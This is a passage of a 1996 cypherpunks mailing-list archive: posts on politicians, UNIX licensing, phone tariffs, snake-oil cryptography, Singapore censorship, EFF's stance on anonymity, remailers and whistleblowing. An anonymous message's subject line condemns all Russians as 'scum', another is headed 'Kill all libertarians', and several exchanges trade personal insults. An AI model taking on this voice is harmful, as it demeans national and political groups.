jgBNJEsP8JdZnQTheRCwR4cgwIHc/Csmu+Ab5UN8h5L7VV1u2YFfkA== =PgX+ -----END PGP SIGNATURE----- From dlv at bwalk.dm.com Tue Sep 3 01:27:15 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Tue, 3 Sep 1996 16:27:15 +0800 Subject: Kill all "libertarians" In-Reply-To: <199609021626.SAA11752@basement.replay.com> Message-ID: >From nobody at REPLAY.COM Mon Sep 2 12:26:36 1996 Received: by bwalk.dm.com (1.65/waf) via UUCP; Mon, 02 Sep 96 15:42:57 EDT for dlv Received: from basement.replay.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA18013 for dlv at bwalk.dm.com; Mon, 2 Sep 96 12:26:36 -0400 Received: (from replay at localhost) by basement.replay.com (8.7.5/8.7.3) id SAA11752 for dlv at bwalk.dm.com; Mon, 2 Sep 1996 18:26:28 +0200 (MET DST) Date: Mon, 2 Sep 1996 18:26:28 +0200 (MET DST) Message-Id: <199609021626.SAA11752 at basement.replay.com> To: dlv at bwalk.dm.com From: nobody at REPLAY.COM (Anonymous) Organization: Replay and Company UnLimited Xcomm: Replay may or may not approve of the content of this posting Xcomm: Report misuse of this automated service to Subject: All russians are scum. No exceptions. Return-Path: To: cypherpunks at toad.com Subject: Re: Sen. Leahy's "impeccable cyberspace credentials" From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Comments: Dole/Kemp '96! Date: Mon, 02 Sep 96 01:19:37 EDT Organization: Brighton Beach Boardwalk BBS, Forest Hills, N.Y. Sender: owner-cypherpunks at toad.com jonathon writes: > On Sun, 1 Sep 1996, James A. Donald wrote: > > > > I agree with what you are saying but not all polititions are that bad. > > > You make it sound as if their are no politisions are for freedom of the > > > net. > > So who is the exception? > > Harry Browne Libertarian Party Candidate. Harry Browne is a fucking statist. All politicians are scum. No exceptions. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From wombat at mcfeely.bsfs.org Tue Sep 3 01:36:54 1996 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Tue, 3 Sep 1996 16:36:54 +0800 Subject: [OFF TOPIC] Re: SCO giving free licenses to UNIX OpenServer In-Reply-To: <322B4E8E.41C6@ai.mit.edu> Message-ID: Ah, round 274,562,889 of the OS wars ... On Mon, 2 Sep 1996, Drr Phill wrotee: > Eric Murray wrote: > > > > Scottauge at aol.com writes: > > Errmm.. hate to disappoint but SCO UNIX started life as Xenix which > was written by Microsoft in the dark ages. > OTOH, UNIX Systems Labs was sold to Novell, who didn't do much with it, and then sold it to SCO. A free single-user license sounds suspiciously like the old Novell Personal Edition Unixware. Anybody know if this is what's being given away? I'd look, but I haven't got much use for yet another free UNIX - the two I have work fine. > > > > This is for single user home based UNIX systems. > > > > Single-user UNIX isn't all that useful. > If this is the old Pers. Ed., it will support one or two users via telnet/ftp in addition to console. Certainly enough for someone who wants a system for educational purposes, using X-windows to access the office, work on coding, etc. If you want to write a commercial app. for SCO, it's darn nice of them to give you a free license to use as a development platform. > Multi-user ain't much better. Listen to the guys who built it. UNIX > is a program development environment. In the early years it was > interesting because there was source available, that ceased to be > the case years ago. I feel so stupid for having bought all that Sun Microsystems and HP stock years ago ... It is a good platform for many applications; running a desktop OS for a user who only types memos and takes phone messages probably isn't one of them, although I'm sure I'll hear from someone who disagrees. It does make a good, scalable base for SQL databases, is the primary handler of email, runs a lot of the world's engineering software, etc ... I'm sure if you looked around you'd even find Solitaire for it. :) I use M$-Windoze as the standard desktop for most business applications, with UNIX-based SQL servers, web servers, and email servers, in general. Just my preference. > > Today Linux probably represents the future of the UNIX familly, it > allows people who want to hack at the OS level access to the sources > of a fully functioning OS. This allows people to add in new kernel > features, schedulers and other exotica without having to write a > whole new O/S. > I wouldn't expect a free OS in a constant state of change to replace commercially supported operating systems; they each have their purposes. Some people want access to the source code, and some people want 24x7 on site support. Yes, there's great support available for Linux and BSD on the 'net. That's not at issue. Some business models need a vendor out there that can furnish a maintenance contract and uphold it. > Just don't confuse it with "home computing", this is geek computing > and you better have a lot of interest in computing to use it. Home > computing is the market for users who need a system thats simpler > than a VCR or they can't use it. At one time that meant Apple, today > it means Microsoft, it will never mean Linux - not unless someone > can make Linux much much simpler than it is at present and provide > decent WISIWIG tools such as editors etc. designed for use by aunt > Ethel. Maybe Aunt Ethel is into kernel tuning. ;) I agree with you to a point; UNIX has not had an idiot-proof "stick the disk in the drive and type setup" capability until recently. UNIX apps are fewer in variety, and cost nmore than their M$-D0S/Windoze counterparts. Partly because anyone who wanted to develop could do so on an affordable D0S system. If the free SCO offering is the old Novell Pers. Ed. (I don't know, just venturing a guess), Aunt Ethel just might be able to install it (your Aunt Ethel - mine's a kernel hack). As I recall, it came w/ a GUI installation routine. Just my $.02 > > > Phill > From jimbell at pacifier.com Tue Sep 3 02:02:42 1996 From: jimbell at pacifier.com (jim bell) Date: Tue, 3 Sep 1996 17:02:42 +0800 Subject: Modem tax again? Message-ID: <199609022230.PAA15730@mail.pacifier.com> Yes, isn't it interesting how they managed to turn this issue into their desire to "end a subsidy," when you know they would be terrified of REALLY ending the various telephone subsidies that are operating. For years, businesses have paid more for telephone service than residences. While this might have made sense in the era before digital switches, it does no longer. Also, the claim that "Internet users are overtaxing phone networks and ought to pay more for monthly service" isn't believable. In my experience, the time between 9:30 pm and 11:00 pm is the only time which usually produces busy signals to my ISP, a time which is when, traditionally, telephone traffic is quite light as compared to peak hours. I'd be happy to compare the "usage-factor versus time" of ISP's versus regular voice calls if I had the numbers, but I suspect that calls to local ISP's complement voice traffic rather than add to its peaks. At 01:40 PM 9/2/96 EDT, E. ALLEN SMITH wrote: > As I recall, the alleged "subsidy" consists of lack of payments so >rural areas can have subsidized phone service - thus making their costs borne >by everyone else. > -Allen > >> _________________________________________________________________ >> Avis >> _________________________________________________________________ >> INTERNET IS HURTING PHONE NETWORKS, STUDY SAYS >> __________________________________________________________________________ >> Copyright © 1996 Nando.net >> Copyright © 1996 San Francisco Examiner > >> SAN FRANCISCO (Aug 27, 1996 3:11 p.m. EDT) -- Hoping to reduce or end >> a subsidy that has kept down the cost of on-line service, local phone >> companies here have presented the Federal Communications Commission >> with studies arguing that Internet users are overtaxing phone networks >> and ought to pay more for monthly service. > >> The studies, one of which was published on the Internet, argue that a >> 13-year-old subsidy lets Internet service providers (ISPs) pay a >> fraction of what a long distance company pays to get a phone line, >> even though Internet calls may use more phone system capacity than >> voice traffic. > >[...] > >> For their part, ISPs are alarmed at the remote possibility that the >> FCC might let phone companies raise their monthly costs from the >> current monthly average of $30 to anything approaching the $600 that >> some long distance carriers pay for a phone line. > >> "If we had to pay anything like long distance access charges, it would >> put all the ISPs out of business," said Ronald Plesser, the >> Washington, D.C., attorney who represents the Commercial Internet >> Exchange, an ISP trade group. > >> FCC staff attorney Kevin Werbach said the subsidy began in 1983, when >> the five-member federal commission created a special rate to encourage >> the growth of on-line services, voicemail companies and other emerging >> industries that offered enhanced electronic services over phone lines. > >> In 1987, the FCC considered ending the subsidy but backed down after >> public protest over what came to be characterized as the "modem tax." >> Given the growth in on-line usage, ISPs assume any talk of ending the >> subsidy would create a bigger backlash today. > >> "There are a minimum of 20 million and perhaps as many as 40 million >> on-line and Internet users and many of them are registered voters," >> said William Schrader, president of PSI Net, an ISP in Herndon, Va. > >> Schrader said when he visited several FCC members recently, he >> suggested that many of those users would be happy to send a letter of >> protest to FCC Chairman Reed Hundt. > >[...] > >> Copyright © 1996 Nando.net > > Jim Bell jimbell at pacifier.com From unicorn at schloss.li Tue Sep 3 02:19:15 1996 From: unicorn at schloss.li (Black Unicorn) Date: Tue, 3 Sep 1996 17:19:15 +0800 Subject: Pseudocrypto detector is going wild (was: Re: ALPHACIPHER - An unbreakable encryption program.) In-Reply-To: <864tlgivwo.fsf@goffette.research.megasoft.com> Message-ID: On 2 Sep 1996, C Matthew Curtin wrote: Alex Walker > claims: > > The strongest encryption system available to the public will be available > > soon at: [Blah Blah Blah] > > > > A demo of this program along with a FAQ can be downloaded from > > cyber-survival-hq 1SEP. This is an unbreakable program... > > Here we go again. > > I just got done surfing the site above. Assuming that all statements > regarding the unbreakability of the cipher, the lack of applicability > of the question regarding its key size, etc., are at least based on > some degree of truth, "alphacipher" is a one-time pad. Given that > anything else is not really "unbreakable," if it's not a one-time pad, > the claims about its security are bogus. Looks like another snake oil peddler. Look, Mr. Walker: Either you are a marketing type, in which case I suspect you have no idea what you are peddling, you are a techncal type, in which case you are deceiving us, or you don't really know what you are doing, in which case you are making representations without the benefit of knowledge. In any of these cases, you are, it seems to me, peddling garbage. > If I'm wrong, please show me how so. If not, please do us all a favor > and quit with the advertising claims. Crypto, for some reason, seems to be at the level of hair tonic when it comes to hype advertizing making up for 0 in product quality. > (All I need now is someone to threaten to sue me, and I'll maintain my > record of having lawsuit threats made against me every time I > criticize something that claims to be "strong crypto.") Any attorney who knew anything would have that suit laughed out of court. If he sues in D.C. come see me. > - -- > C Matthew Curtin MEGASOFT, INC Chief Scientist > I speak only for myself. Don't whine to anyone but me about anything I say. > Hacker Security Firewall Crypto PGP Privacy Unix Perl Java Internet Intranet -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From mch at squirrel.com Tue Sep 3 02:22:22 1996 From: mch at squirrel.com (Mark C. Henderson) Date: Tue, 3 Sep 1996 17:22:22 +0800 Subject: DON'T Nuke Singapore Back into the Stone Age In-Reply-To: Message-ID: <9609022116.TE21076@squirrel.com> On Sep 2, 7:06, James Seng wrote: > Subject: Re: DON'T Nuke Singapore Back into the Stone Age > On Sat, 31 Aug 1996, Timothy C. May wrote: > > The point is to make clear to them that the Usenet and similar Web sites > > are global in nature, not subject to censorship without a very high local > > cost. If discussions of Lee Kwan Yew's dynasty are considered illegal, then > > Singaporans will have to choose not to carry the various newsgroups into > > which *I* post such messages! > > Just let to add my comment in regard to this unforuntate discusssion. > > To understand the sitution better, you should not impose America > idealogy and perspection on how things to be done to Singapore. Singapore > maybe young but there are certain culture too. Let me see, our "American idealogy" is blinding us to the wonderful government of Singapore which jails and tortures its citizens for expressing political views which might call the government of Singapore into question. Check out, for example, this interview with the former Solicitor General of Singapore. http://www.unl.edu/scarlet/v5n33/v5n33qa.html Nothing earth shattering at this URL - just what we all expect from a police state. -- Mark Henderson -- mch at squirrel.com, henderso at netcom.com, markh at wimsey.bc.ca ViaCrypt PGP Key Fingerprint: 21 F6 AF 2B 6A 8A 0B E1 A1 2A 2A 06 4A D5 92 46 unstrip for Solaris, Wimsey crypto archive, TECO, computer security links, change-sun-hostid, Sun NVRAM/hostid FAQ - http://www.squirrel.com/squirrel/ From enzo at ima.com Tue Sep 3 02:26:13 1996 From: enzo at ima.com (Enzo Michelangeli) Date: Tue, 3 Sep 1996 17:26:13 +0800 Subject: Encourage Singapore To Come Out Of the Stone Age In-Reply-To: <199609021945.MAA05327@dns2.noc.best.net> Message-ID: On Sun, 1 Sep 1996, James A. Donald wrote: > At 07:13 PM 9/2/96 +1000, James Seng wrote: > > What i am saying is that Asian (Singapore) > > values are _DIFFERENT_ from western (America) values. > > One of the classic Greek rationalizations for slavery was that Asians > are slaves by nature. > > It would seem that you are saying that they were right. Only if you assume that values depend on the nature, which James didn't say. (Besides, Greeks didn't need to rationalize: slavery was part of their society, not only in cities like Sparta based on a caste-style social structure, but also in the "democratic" Athens. Aristoteles shrugged off the whole issue saying that slavery would have been abolished only if "machines could move by themselves": and the prophecy has proven accurate indeed). Back to the nature vs nurture issue: even though I usually agree with most of what you say, I must disagree with your .Sig file: > We have the right to defend ourselves | http://www.jim.com/jamesd/ > and our property, because of the kind | > of animals that we are. True law | James A. Donald > derives from this right, not from the | > arbitrary power of the state. | jamesd at echeque.com The idea that rights and values can be "natural" is contradicted by several thousand years of history, during which absolutism or downright tyranny have been well more common than freedom. The success of that misleading view in America, and by extension in most of the western countries, is largely due to the unfortunate influence of French rationalism over the founding fathers, as Hayek repeatedly noted. (A similar criticism of the theory of built-in values in Rousseau and his followers, with emphasis on the ethical -as opposed to economic/ political- side, was moved by Nietzsche in "Human, all too human"). In the real world, freedom is a by-product of a materially prosperous society (which is why capitalism generally produces free societies, but socialism does not). Constitutional papers should spell what a society guarantees to and what it expects from its members, not the (supposed) nature of the latter. Trying to build a free society by screaming loud what the "natural" rights are supposed to be, has no better chances of success than trying to summon a god into existence by virtue of prayers. Enzo From unicorn at schloss.li Tue Sep 3 02:43:27 1996 From: unicorn at schloss.li (Black Unicorn) Date: Tue, 3 Sep 1996 17:43:27 +0800 Subject: What is the EFF doing exactly? In-Reply-To: <199609022254.PAA09742@netcom10.netcom.com> Message-ID: On Mon, 2 Sep 1996, Vladimir Z. Nuri wrote: > > ah, the quasi-yearly ranting on EFF has started up. what a great > opportunity for drop-down-drag-dead flamewar. > > Black Unicorn: I resent your holier-than-thou moral posturing > over EFF, and am going to attack it as representative of other > criticism I have seen of EFF. I, unlike EFF, have never compromised my efforts to make strong crypto, unescrowed strong crypto, and digitial communications, free from the FUD spouted by government and media alike. I, unlike EFF, have never compromised my efforts to resist the expansion of a wiretap state. I, unlike EFF, have never proported to be a political represenative for these positions and folded under the weakest of pressures like a reed. > EFF is an organization that is professional and has > worked toward improving cyberspace. it is easy for someone > such as yourself to criticize such an organization anonymously, > but what is the justification of your criticism? to me someone > who has tried and failed, yet is still trying, is better than > someone who has never tried. I would put forth that you know nothing of my efforts, and therefore are in no position to judge me. I would also put forth that the efforts of EFF, or lack thereof, are quite public. > what *constructive* > alternative to EFF do you propose? if you have none, please shut up. I think any organization that would apply political pressure rather than bow to it would be an alternative. I think an organization in touch enough with its own policy to prevent its staff and board from making embarassing big brother type proposals to curtail the ability of any of us to post without attributation would be an alternative. I think an organization without the internal conflict and strife that has clearly marred EFF in past and made it a laughable attempt at cohesive political persuasion would be an alternative. I think an organization that had official policies on the core issues which it proposes to influence would be an alternative. In short, an organization that had even one of the needed elements of legislative influence. (Cohesive, directed, persistent, and uncompromising). > I am tired of people announcing loudly to the world, "well if EFF > doesn't support [insert my personal jihad here], then they're > a bunch of losers who don't deserve anyone's money". Now who's holier-than-thou? What is so shocking about announcing that a given organization does not support my interests and therefore calling on others who share my interests not to make financial donations to said organization? Is there something EFF fears in free speech and political consensus building? Perhaps if they had a straightforward policy.... Were I to say that the Clinton administration has accomplished nothing but oppression (not that this is necessarily my view) and that others should place their resources elsewhere would you claim that somehow I was in the wrong? Political speech is in the air every day. Learn to live with it, even if you do not agree with the points contained within. Phrased another way, who cares what you are tired of hearing? That's what filters and channel changers and off buttons are for. > >Why am I any more mistaken for pointing out that a single influential > >member of EFF's staff or board is anti-anonymity and yet remains with the > >organization than you are for pointing out that a single influential > >member who happened to be anti-anonymity has left? > > get a clue. an organization does not have to officially espouse what > its members espouse. No, but when an organization espouses nothing on a given subject key to its mission, what does that say? What about when its members espouse entirely different and even counter productive beliefs? I would hardly trust Senator Burns on the board of the ACLU, or a George Pacific exec on Sierra Club's board. What's different here? > what an organization espouses should be carefully > crafted. if all members feel strongly about an issue, yet all also > feel that it should not be part of the official plank, then that may be > a wise decision to leave it out. what an organization does *not* do is as > important as what it does do. EFF is learning, by trial and error and the > hard way, to "choose battles wisely". I thought its point was to protect cyberspace? What battles are left after Digital Telecom, Anonymous Communication, Strong Crypto and CDA? There aren't many battles to choose. Let's seem some action. I can sit on my hands all day long too, but I will hardly claim to be supporting hunger prevention in Africa by "thinking very hard about the subject." (Particularly not when I have accepted money to further that goal). > I would love to see more info about EFF's new direction. but one > can ask for such clarification without a rabid style such as your own. Are you one of those people who still believes you can get more flies with honey...? Ever been to Washington, D.C.? > >In so far as an organization is much defined by those involved, I think it > >entirely right to wonder aloud about the personal motives of the staff and > >board. I think this PARTICULARLY prudent given EFF's reputation and prior > >conduct. > > blah, blah, blah. why should EFF give the slightest damn what you think > of them? Its fairly clear that they don't. That said, why should I not make that point known. "Folks, EFF doesn't give a damn what I think. If you think what I think, then they don't give a damn what you think either." This is called POLITICS. They are free to ignore people like me when we comment that their public appearance is damaging them. They will also pay the price for doing so. What kind of organization proports to support and then ignores the public? if you were at the helm of a competing organization that > was doing superior work, or a privacy lobbyist with a track record, > maybe they should listen. as it stands I think they are giving you > far more respect than you deserve by even responding to your > various scurrilous insinuations. Apparently their view of the respect I deserve and yours are disperate. You yourself admitted that my criticisms were generally represenative. I hardly think my worth is the issue. > why do I see so much of this in cyberspace and on the cpunks list: > gripes, gripes, gripes by people who have no record themselves of > doing anything constructive...? the difficulty of doing something > constructive is proven by the failures, it is not necessarily > evidence of incompetence or conspiracies. perhaps you, Unicorn, > feel the cpunks have a greater track record than EFF? I do infact feel the cpunks have a greater track record than EFF. Tell me, what has EFF done? The list of "cypherpunk" accomplishments in terms of making the net a better place to be is, in my view, significant. Certainly the discussion here is livelier than anything I've seen from EFF. > >I would be most happy to be proven wrong and see EFF suddenly, in a burst > >of impressive moral fiber, speak out publically and take some political > >action to assure anonymous communication. > > I would like you to explain why you feel the need to criticize EFF > for not necessarily sharing your own agenda. The same reason I feel free to criticize communism for not sharing my own agenda. You reveal here the basic character of your objection. You don't like the fact that I criticized EFF. It has nothing to do with the fact that you think EFF has done wonderful and fantastic things (you point to none in this post) but that you have some emotional fondness for them. This is the trap. EFF _sounds_ good, and so its worth sticking up for. Well what, EFF, have you done for us LATELY? > >Well, let's have a clear official position issued then to end all dispute. > > again, you fail to grasp: EFF may justifiably not want to engage in that > fight. it might be a wise decision. who are you to dictate EFF's > agenda? why are you picking a fight with someone who might be the > best ally? If EFF is the best ally then we need to seek others. They have done nothing in my view to help keep strong crypto around, to secure a person's right to speak without a citizen unit I.D. being attached, and to promote, by extension, free speech. Look, even you have gotten on my case here for speaking without revealing my real name. You think something I said libelous? Is it dangerous? Would you like to contact me further about it? What precisely is the need to attach my real name to this work about? It's about retribution. It's about the need to see people unable to really speak as they think, and the need to have words softened so no one is "hurt." Forget it. I will not pay the political and financial price of revealing my name just to make you, or anyone else, happy. > >I'm hardly going to support an organization that proports to be > >pro-internet freedom and yet has no official position on anonyminity. > > perhaps you would be more influential if you learned to spell what > you are advocating. (hee, hee) English is not my first language. Start paying my hourly rate to type in the thousands of words and dozens of legal summaries I send to this list every month and I will begin to proof read carefully. > > Of > >course you should expect people to wonder about EFF when you have no > > official position and yet some staff and board members seem to have a > >statist bent. > > and you, like many other cypherpunks and cyberspace weasels, > have a whine-and-shriek-from-the-shadows bent. And your point is? You'd like the shadows lifted? Speaking without a true name attached is somehow evil? > BTW, I reject the claim by some here (e.g. TCM) that the supposed change in > direction at EFF implies that such an organization is inherently > top-heavy and will fail in comparison to cypherpunk guerilla-style > "technology deployment." it seems to me both the cpunk philosophy > and the EFF philosophy can coexist, and I really get tired of people > who can't think past a "only one can exist" worldview. Why not make some solid arguments for why TCM is wrong then? Certainly it appears he is on the mark to me. > I also don't understand the anonymity fight by cpunks. it's the > wrong battle imho. ask any remailer operators how their services > are panning out. they will complain of the incessant spam and > increasing litigious pressure. I don't see any technological > solutions to these problems. if there were, they'd have been > invented now. This is EFF talking. "The situation is hopeless, bail now to preserve image." > let's face it, anonymity is a pain in the ass > to support. maybe there are other goals that are more crucial > that lie at the heart of anonymity. what cpunks are really > seaking is "assurance of freedom from retribution". when the > problem is phrased more openly like that, other solutions become > possible and worth consideration. anonymity is only one such > way to achieve this goal. I for one would like to see more > experimentation with reputation systems. "aw gee, nobody knows what > one would look like". well, that's the point. Explain to me how reputation systems work in the absence of anonymity. Explain to me when freedom has been anything but "a pain in the ass." Weakness is all you have to offer. Offer it to EFF. -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From stewarts at ix.netcom.com Tue Sep 3 02:46:24 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 3 Sep 1996 17:46:24 +0800 Subject: What is the EFF doing exactly? Message-ID: <199609030615.XAA15848@toad.com> Black Unicorn wrote: >> > > What is or is not your personal or EFF's official position is meaningless. >> > > It is clear that the personal beliefs of those involved in EFF are >> > > those of compromise, present day politics, and a general lack of moral >> > > fiber. While nobody's called Esther Dyson a Communist here yet, there are people on the board I disagree with - Mitch Kapor, in particular, has shown signs of being a (gasp!) Democrat! My initial reaction to the EFF's first year or two was that they were doing some very good things (the Steve Jackson defense), and also had people making speeches about the need to provide everybody with access to the Information SuperHighway. Getting the S.266 anti-crypto-pro-wiretapping bill killed a few years ago was what convinced me to join them, though their compromise positions on some of the other anti-freedom bills since then have not helped my mixed views of the organization. With all due respect to Jerry Berman, I'm more comfortable now that they're not Washington Insiders any more. >Why am I any more mistaken for pointing out that a single influential >member of EFF's staff or board is anti-anonymity and yet remains with the >organization than you are for pointing out that a single influential >member who happened to be anti-anonymity has left? .... >Maybe there should be an EFF position on the matter. Maybe. If it's a good position, it will recognize that anonymity is a mixed blessing; there are people who use it creatively and responsibly, like Black Unicorn and Lucky Green, and there are spammers who abuse it to the detriment of society, like the slimeball who used my remailer to post hatemail to the gay newsgroups with somebody else's name attached to the bottom. On the other hand, free speech is also a mixed blessing; there _are_ things I wish people had the good taste not to say, but I'm not going to get in Voltaire's way while he defends to the death their right to say them... # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From stewarts at ix.netcom.com Tue Sep 3 02:57:01 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 3 Sep 1996 17:57:01 +0800 Subject: Whistleblowing on the Internet Message-ID: <199609030615.XAA15838@toad.com> At 04:02 PM 9/2/96 EDT, "E. ALLEN SMITH" wrote: >There's also the point that some whistleblowing isn't exactly >what some political groups would want to occur. For instance, opponents >to unions such as myself aren't going to want a whistleblower to be able >conveniently to report their exclusion from a job due to union membership. While some unions are clearly run by and for thugs, some employers have also hired thugs to attack union organizers, and both unions and employers have convinced government thugs to attack their opponents, though unions generally have convinced governments to write laws with fines attached, while employers have often had actual Federal troops shooting union strikers, and have had police refrain from defending strikers from attack. In a free market, there wouldn't be laws requiring or forbidding union membership, and some unions would prosper by providing good service to their members and to the employers that hire them, while others wouldn't. I'd be happy to see union members able to anonymously blow the whistle on employers that blacklist union members, though it's harder to be credible with the public if you're anonymous, and particularly hard to get people to believe "Employer MegaFooBar refused to hire [name deleted for privacy], a member of the IBCPARO, because of his union membership" without revealing enough about the union member's identity that the employer knows, and therefore telling all other employers to know that the guy is not only a union member, but also a troublemaker. In this case, the technology is more strongly useful for maintaining blacklists than for detecting or outing blacklist users. Unfortunately, that's especially true because government taxation and anti-immigrant policies require that employees provide employers with a [mostly] unique ID number and papers to prove who they are, so you can't just show up at a construction-workers' hiring hall, call yourself Joe, and get your pay in cash at the end of the day. (Unless you're already an illegal immigrant, in which case it works fine, but then it's tough to be a union member.) # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From stewarts at ix.netcom.com Tue Sep 3 03:00:47 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 3 Sep 1996 18:00:47 +0800 Subject: Whistleblowing on the Internet Message-ID: <199609030615.XAA15843@toad.com> Geoffrey Gussis wrote: >| Overall, I am quite surprised that there isn't a whistleblowing >| clearinghouse on the Internet; a site sponsored by a non-profit that lists >| email addresses and secure forms for sending anonymized email to those >| areas of the public and private sector that deal with whistleblowing. Alt.whistleblowing was started a while ago, and was probably pretty quiet (not that I've read it in years.) Of the 5 articles there today, one is from Geoffrey Gussis, one is a reply, one has an EPA phone number, one is test, and one is spam. The reply said #> See www.taf.org on the net. #> See www.whistleblowers.com on the net #> In a few weeks, our site will be up, and we are also #> involved in bringing false claims act or whistleblower #> lawsuits. We have one under seal, and three more pending. > Such a clearinghouse is what we call a fat target; something >likely to attract attention since wiretapping it could be very useful >to an organization that worried about having a whistleblower. That kind of wiretapping we can deal with. Forging Usenet headers was easy enough even without anonymous remailers, and chaining encrypted messages through remailers should be adequate, even without the huge mix volume of anon.penet.fi. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From jimbell at pacifier.com Tue Sep 3 03:09:22 1996 From: jimbell at pacifier.com (jim bell) Date: Tue, 3 Sep 1996 18:09:22 +0800 Subject: POT_hot Message-ID: <199609030651.XAA09953@mail.pacifier.com> At 11:39 PM 9/2/96 GMT, John Young wrote: > Foreign Affairs, Sep/Oct, Lead Essay: > > "Postmodern Terrorism. The terrorism of the future may be > far more destructive than terrorism as we have known it." > > An informative survey and pot-heat by Walter Laqueur. > > Terrorism's prospects, often overrated by the media, > the public, and some politicians, are improving as its > destructive potential increases. Terrorism has > replaced wars between nations of the 1800s and 1900s. [deleted] > Why assassinate a politician or indiscriminately kill > people when an attack on electronic switching will > produce far more dramatic and lasting results? If the > new terrorism directs its energies toward information > warfare, its destructive power will be exponentially > greater than any it wielded in the past -- greater > even than it would be with biological and chemical > weapons. The single successful one could claim many > more victims, do more material damage, and unleash far > greater panic than anything the world has yet > experienced. > http://jya.com/pothot.txt (30 kb) Am I being unreasonable to expect at least a certain degreee of logic in the world? Why is it that this guy (Laqueur) seems to believe that the future is filled with "greater panic than anything the world has yet experienced." I believe that, while there may be panic, it'll be panic on the part of the politicians, not ordinary citizens. I suppose a certain amount of bias is to be expected, seeing as how it's Foreign Affairs magazine. Jim Bell jimbell at pacifier.com From mech at eff.org Tue Sep 3 03:14:42 1996 From: mech at eff.org (Stanton McCandlish) Date: Tue, 3 Sep 1996 18:14:42 +0800 Subject: What is the EFF doing exactly? In-Reply-To: Message-ID: <199609022255.PAA19109@eff.org> (You may need to manually repost this to c'punks. NB: I did not authorize redistribution of my email to you to c'punks in the first place. But since it's there now... Black Unicorn typed: > > Why am I any more mistaken for pointing out that a single influential > member of EFF's staff or board is anti-anonymity and yet remains with the > organization than you are for pointing out that a single influential > member who happened to be anti-anonymity has left? I didn't say you were more mistaken than anyone or anything else. I'm not aware of a mistakenometer with which to make such a measurement. I pointed out your assumption that "It is clear that the personal beliefs of those involved in EFF are those of compromise, present day politics, and a general lack of moral fiber" is not in fact "clear" at all, because you have insuffient information to make such a statement. You don't even have to belive my remark that others in EFF have very pro-anonymity positions - you categorization of EFF is still logically bankrupt, because you don't have enough facts to make it. > If my position, as you represent, is misguided, surely your point about > Mr. Johnson is equally so. If the board is almost 100% pro-anonymity, > where's the official position? The board is not almost 100% pro-anonymity. There are widely differing opinions on the topic, and many board members have not directly wrestled with this issue before at all. I've seen some opinions shift in the space of a few messages. This should clearly illustrate why there is no official position yet. Some EFFers are not only not in agreement with eachother on this, but aren't sure where they stand at all. This is the first time the issue has come up for the board as a whole since early 1995, and the board's composition is very different now. This is the same process EFF goes through every time an issue comes up on which we have no position. Sometimes a position is agreed upon, and there we are, but sometimes no position is taken, as is still the case with intellectual property. In cases like that, we look at what happens on a case by case basis, rather than categorically. (That is to say, even on stuff where we have no position, if something happens that harms the public interest we do not feel any obligation not to act simply because we lack a position on the meta-issue.) It will take some time to formuate a position on it. Personally, I am confident that if EFF takes a position on online anonymity, it will be the positive stance you would expect from us. It is also likely to be tempered with a discussion of responsibility issues, just like every other EFF position. This is not a "sellout" or a "compromise" just a recognization of fact: anonymity does have costs associated with it, such as the ability to defame without the defamed party having much recourse other than contradiction. Such costs should be stated openly, not lied about or ignored. If EFF or other organizations pretend there are no costs or belittle concerns about costs, we undermine everything we are working for - we undermine the public interest and individual liberty. > In so far as an organization is much defined by those involved, I think it > entirely right to wonder aloud about the personal motives of the staff and > board. I think this PARTICULARLY prudent given EFF's reputation and prior > conduct. That's fine. I do think you should wonder. But wondering and making unfounded accusations are different things. It's one thing to say, "I wonder if Black Unicorn has good moral fiber whatever that is, and in fact I suspect he doesn't" (hypothetically, mind you), but it's quite another to say "Black Unicorn has no moral fiber!" (whatever moral fiber might be.) > > I would be most happy to be proven wrong and see EFF suddenly, in a burst > of impressive moral fiber, speak out publically and take some political > action to assure anonymous communication. Don't be surprised if it happens. Also don't be surprised if it doesn't happen. In EFF's 6+ years, no clear consensus on anonymity has yet evolved within any version of EFF's board and staff. DO be surprised if you see EFF take an official position against anonymity. If that happens, I'll start looking for another job. I'm confident it won't happen, or I'd probably already be looking for another job. > > > > Things simply are not as black and white as they might seem. > > > > Well, let's have a clear official position issued then to end all dispute. > I'd like to see that too, but it may be a while in comming. > What is EFF doing if not supporting anonyminity? That's a very good question. EFF has, the entire time I've been with it, and before that the entire time I was observing it (that is, ~1992 to present) been quite supportive of anonymity, in ways that range from relying on facets of the NAACP case in our own CDA challenge, to defending online anonymity when being interviewed by the press, to providing publicly available materials (e.g. at http://www.eff.org/pub/Privacy/Anonymity) on anonymity including remailer lists and FAQs, to having a link on our "other interesting sites" page to the WWW remailer gateway, to permitting anonymous posts to all of our public mailing lists. I can't think of any EFF statement against anonymity, and even Esther's personal statement is not against anonymity, just advising caution and noting that there are many unresolved concerns in this area. > I'm hardly going to support an organization that proports to be > pro-internet freedom and yet has no official position on anonyminity. Of It's certainly your right to not support us. I'm sad that you won't, but it is beyond anything I can do anything about. Positions on issues take time to evolve. > course you should expect people to wonder about EFF when you have no > official position and yet some staff and board members seem to have a > statist > bent. Again, I think you're making unfounded assumptions. The fact that Dyson has questions about the balance of the value and cost of online anonymity does not indicate a "statist bent". Hell, *I* have questions about that balance. For myself, I've found adequate answers, and have come to the conclusion that even if anonymity on the net were abused 1000x more than it is now, it would still be better to have anonymity than to not have it. But I have to let other people come to that conclusion themselves, with my help when appropriate. I can't find any value in demonizing others who've not come to that conclusion, even if if I do find value in severely criticizing people who have taken a completely anti-anonymity position, which Dyson has not. 